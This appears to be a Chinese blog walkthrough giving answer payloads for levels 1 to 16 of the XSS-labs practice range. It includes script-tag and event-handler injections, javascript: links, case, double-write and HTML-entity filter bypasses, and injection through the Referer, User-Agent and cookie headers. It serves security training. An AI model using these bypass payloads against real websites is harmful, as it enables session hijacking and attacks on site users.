XSS-LABS通关(纯答案,弱思路)

于 2024-09-18 16:51:59 发布
阅读量557 收藏 3
点赞数 11
分类专栏: 漏洞靶场 渗透测试 答案 文章标签: xss php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77433128/article/details/142317802
版权

我的解题思路

  在可以输入数据的地方输入一些数据,看看源代码的那里可以找到他们,在输入一些字符看看有没有被过滤,最后观察源代码思考渗透手段。

level1

在URL的?name=后输入答案

<script>alert('a')</script>

level2

首先在输入框中输入后点搜索,发现没用,按F12查看源代码。
源代码:<input name="keyword" value="<script>alert('a')</script>">,发现这个地方没有任何过滤
所以这么改,在value="后输入">使其闭合,并在">前面添加//将其注释

<input name="keyword" value=""><script>alert('a')</script>//">

最后将答案"><script>alert('a')</script>//复制提交

level3

首先还是按照level2的思想,输入'"><看看有没有被过滤,发现"<>被实体化成了 &quot;&lt;&gt;
所以想到用HTML事件来解决
onblur()为例,onblur 在元素失去焦点时触发。Onblur 通常用于代码验证(当用户离开表单输入域时)。
答案' onblur='alert(/xss/)
注意:这里要用 ’ 去闭合value属性(自己去试)!

level4

思路与level3一样(自己去试)!
答案" onblur="alert(/xss/)

level5

首先还是按照同样的的思想,输入'"><看看有没有被过滤,发现"<>没有被过滤。发现过滤情况与上一关很像,于是复制上一关代码,发现变成"on_blur="alert(/xss/)。这是因为它过滤了以on开头的HTML事件,所以想到可以用javascript伪协议(自行科普)。
答案"><a href="javascript:alert(/a/)">Zedex</a>,记得点击Zedex。

level6

观察,然后输入level5的答案,查看源代码发现href被过滤成了hr_ef,所以考虑大小写绕过。
答案"><a hRef="javascript:alert(/a/)">Zedex</a>

level7

观察,然后输入level5的答案,查看源代码发现hrefscript被过滤了,所以考虑双写绕过,注意hrefscript不能直接写在后面不然就达不到双写绕过的效果。

答案"><a hrhrefef="javascscriptript:alert(/a/)">Zedex</a>

level8

观察,输入'"><看看有没有被过滤,查看源代码发现"被过滤了.
点击友情链接发现URL上会带有你输入的内容,所以试一下javascript伪协议,发现被过滤成了javascr_ipt,于是想看看能不能大小写绕过,不行,于是想着用编码的方式,我用的是burp自带的。我试了之后发现HTML编码是可以的。因为HTML在前端是可以被识别的,浏览器会自动给你解码。
答案&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x2f;&#x61;&#x2f;&#x29;

level9

查看源代码发必需要带http://,所以考虑用http://+编码伪协议。但伪协议又不能放在http://后面,所以把http://放后面并注释掉
答案&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x2f;&#x61;&#x2f;&#x29;//http://

level 10

隐藏表单,有兴趣的话找找其他详细点的文章,这里只提供答案。
答案:把URL中的keyword换成t_sort并在等号后面加上'" onblur='alert(/xss/)' type="text" //,记得刷新一下页面。

level11

查看源代码发现他会把Referer:后的信息添加到value里面
答案:用Burp拦截这个页面的请求,然后发送到Repeater里,在Repeater里添加Referer:'" onblur='alert(/xss/)' type="text" //,然后右键->Repeater in browser->In orginal session,copyURL在浏览器里复制粘贴,记得关闭burp的拦截!
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

level12

思路与level11相同只不过这次是User-Agent:后的信息
答案:与level11相同操作,只不过将User-Agent:后添加'" onblur='alert(/xss/)' type="text" //

level13

查看源代码发现value里面传得是是cookie里面的值,直接在浏览器中修改cookie的值。
答案'" onblur='alert(/xss/)' type="text" //,要把这个值放在cookie里。

在这里插入图片描述

level14

14关网址现在已经不能用了,所以跳过喽。
在这里插入图片描述

level15

查看代码发现src里的值会被include包含,所以思路是引入level1.php并用相应事件来解决
答案src='level1.php?name=<img src=1 onerror=alert(1)>'

level 16

空格绕过,发现会过滤掉你输入的空格,所以考虑用换行符%0A代替空格,这在HTML中是合法的。
答案keyword=<img%0Asrc=1%0Aonerror=alert(1)>

level 17 &18

因为该插件在火狐里用不了,略略略!

牙买加的牙(Zedex)
关注
专栏目录
xss-labs通关大合集
wo41ge的博客
07-26 3万+
xss-labs 文章所用的xss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs 然后开始通关 level1 仔细观察三处箭头,可以发现它是向服务器提交了一个name参数,值为“test”,从页面 回显来看,将neme参数的值显示在了页面上,并且显示了name参数值的字符长度 接下来,查看源码 从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间 那么 就很明显,这一关主要就是考察反射型xss 但是由于不
XSS-labs通关(超详细)
wulanlin的博客
12-30 7037
1.第一关 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三关 ​ 用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看到使
XSS-labs 通关实录
yingu9267的博客
05-02 787
XSS攻击与sql注入逻辑相似,找到注入点,插入恶意代码,过滤绕过……1。
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 5443
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS漏洞---XSS-labs通关教程
zhoutong2323的博客
05-07 223
过滤源码:无pyload: 过滤源码:利用转译函数将特殊字符转译为实体字符 pyload:利用转义函数仅对get参数生效的特点,利用引号闭合value同时注入点击事件 Level-3 过滤源码:利用转译函数将特殊字符转译为实体字符 pyload:利用htmlspecialchars()函数未设置ENT_QUOTES不会对单引号过滤的特性 过滤源码:利用替换函数将get参数替换 pyload:利用href属性中可以执行JS代码的特性绕过防御
【网络安全 --- xss-labs靶场通关(11-20关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-23 1932
【网络安全 --- xss-labs靶场通关(11-20关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS-labs靶场通关
weixin_70292186的博客
05-08 1043
首先说一下embed标签,可以理解为定义了一个区域,可以把html文档、图片、视频、音频等内容内嵌到当前页面,这关浏览器不支持flash插件,所以图片显示不出来,如果感觉别扭,就在后端把。里面的链接失效了,这关跳过,不过提一句,这关涉及到了exif漏洞,原理是有些网站有读取图片exif信息的功能,当网站读取到的恶意的exif信息就会触发属性中的。发现有的转义,还在script中间加了下划线_,接着尝试闭合,同样存在闭合和转义,所以利用a标签的href来闭合。的,所以加个type="text"
记录自己在xss-labs靶场的通关记录
2302_78903258的博客
06-08 1464
我们下载完之后,就可以进行xss-labs-master的搭建,我本人下载的phpstudy是2018年版的将xss-labs-master安装完之后,放到此目录下,我们原本下载的xss-labs-master,我们可以将,便于我们做题时的搜索对于新版本的phpstudy来说,我们可以将xss-labs-master放到此目录下。访问本地配置的xss-labs。
xss-labs 通关教程
SkyWT 的博客
07-05 1988
XSS 攻击历久弥新,目前 XSS 漏洞依然广泛存在。其核心在于找到注入点并通过 payload 让浏览器执行 js 代码。注入点不仅可以来源于用户提供的文本(请求参数或后端存储的字段),也可以是 Referer、UA、Cookie 等。通过<script>标签。通过元素的 onmouseover 属性。通过<img>的 onerror 属性,如。通过 URI,如。一般来说,使用 PHP 的函数能够防御很大一部分 XSS(注意过滤单引号)。许多字符过滤上的漏洞都是没有使用。
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs通关.pdf
04-20
xss-labs靶场20关全通关攻略
XSS跨站脚本攻击及防护
鹿鸣天涯
09-13 1062
存储型XSS:持久性,代码是存储在web服务器中的,比如在个人信息或发表文章等地方插入代码,如果没有过滤或者过滤不严,那么这些代码将存储在服务器中,用户访问该页面的时候触发代码执行。每一个访问特定页面的用户,都会受到攻击。反射型跨站脚本也称作非持久型、参数型跨站脚本、这类型的脚本是最常见的 ,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。反射型也称为非持久型,这种类型的脚本是最常见的,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。
Pikachu靶场之XSS
m0_62438849的博客
09-13 895
alert(document.cookie)test
网络安全-intigriti-0422-XSS-Challenge Write-up
m0_68976043的博客
09-13 605
那怎么污染的,我们通过结果看过程,最后因为svg是我们插进去的,在没有插进去之前div应该是第一个,相当于就是将root覆盖为了root,但是我们的命令在进去之前已经被js处理为数组了,所以最后[outerHTML]后面还有一个1去取payload。JavaScript中,数组的下标可以⽤字符或是字符串数字来取值,所以在原型链中,我们可 以给[]对象添加⼀个名称为1的属性,这样 temp 在通过下标 1 取值的时候,实际上取到的 是数组中属性为 1 的值。我们可以看到已经被污染。要求:弹出域名就算成功。
SEAFARING靶场渗透
kknifek的博客
09-13 549
??echo '<??
dedecms(四种webshell姿势)
最新发布
2301_81881972的博客
09-14 985
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
Netty笔记03-组件Channel
weixin_46425661的博客
09-12 848
本文主要讲解Netty中的组件Channel、ChannelFuture和CloseFuture
【网络安全】-rce漏洞-pikachu
weixin_65311462的博客
09-12 1132
由于应用程序在处理用户输入时未能正确验证、过滤或限制输入数据,导致hacker能通过网络在目标系统上执行任意代码或命令,从而完全控制受影响的系统。RCE漏洞是一种严重的安全漏洞类型,对系统安全构成重大威胁。
xss-labs通关
09-11
您好!对于 xss-labs 的通关,我可以提供一些基本的指导。首先,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过插入恶意脚本来利用网站上的用户。要通关 xss-labs,您需要了解并掌握以下内容: 1. XSS 攻击原理和类型:了解什么是 XSS 攻击以及其不同的类型,包括反射型、存储型和 DOM 型 XSS。 2. 漏洞挖掘和利用:学习如何发现和识别 XSS 漏洞,了解攻击者可能会利用这些漏洞进行的各种攻击。 3. 防御措施:了解如何预防 XSS 攻击,包括输入验证、输出编码、内容安全策略(CSP)等。 4. 工具使用:熟悉一些常用的漏洞扫描工具和渗透测试工具,例如 Burp Suite、OWASP Zap 等。 5. 实践演练:在合法授权的情况下,通过实例进行实践演练,即在模拟的环境中尝试利用 XSS 漏洞进行攻击或防御。 请注意,在进行任何渗透测试或漏洞利用活动时,务必遵守法律和道德规范,仅在合法授权下进行。希望这些信息对您有所帮助,祝您顺利通关 xss-labs!如有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值